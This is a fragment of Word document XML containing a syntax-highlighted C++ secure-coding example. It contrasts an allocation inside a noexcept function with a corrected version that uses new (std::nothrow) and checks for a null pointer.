          <w:p w14:paraId="189EF568" w14:textId="77777777" w:rsidR="00BD756B" w:rsidRPr="00BD756B" w:rsidRDefault="00BD756B" w:rsidP="00BD756B">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>void</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>f(</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>*array, std::</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>size_t</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>size) noexcept {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25395F04" w14:textId="77777777" w:rsidR="00BD756B" w:rsidRPr="00BD756B" w:rsidRDefault="00BD756B" w:rsidP="00BD756B">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>*copy = </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>[size];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24FED3D4" w14:textId="77777777" w:rsidR="00BD756B" w:rsidRPr="00BD756B" w:rsidRDefault="00BD756B" w:rsidP="00BD756B">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>std::</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF1493"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>memcpy</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(copy, array, size * </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>sizeof</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(*copy));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F112868" w14:textId="77777777" w:rsidR="00BD756B" w:rsidRPr="00BD756B" w:rsidRDefault="00BD756B" w:rsidP="00BD756B">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008200"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>// ...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3048070F" w14:textId="77777777" w:rsidR="00BD756B" w:rsidRPr="00BD756B" w:rsidRDefault="00BD756B" w:rsidP="00BD756B">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>delete</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>[] copy;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E1D505C" w14:textId="7B3B3D5B" w:rsidR="00F72634" w:rsidRPr="00BD756B" w:rsidRDefault="00BD756B" w:rsidP="00BD756B">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>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33BB60D" w:rsidR="00F72634" w:rsidRDefault="00974DF7" w:rsidP="0015146B">
            <w:r>
              <w:t>Using std::nothrow, the new operator returns a null pointer or pointer to the allocated space. This solution handles the error condition correctly when the returned pointer is null.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="4E6EA6E9" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2D53E16A"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808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>#include &lt;cstring&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05FB75C2"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808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>#include &lt;new&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AE13A38"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D83264C"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b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>void</w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>f(</w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>*array, std::</w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>size_t</w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>size) noexcept {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B61150A"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>*copy = </w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(std::</w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>nothrow</w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>) </w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>[size];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1670FBE6"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(!copy) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="077C632D"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>    </w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008200"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>// Handle error</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49F566CD"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>    </w:t>
            </w:r>
            <w:r w:rsidRPr="00974DF7">
              <w:rPr>
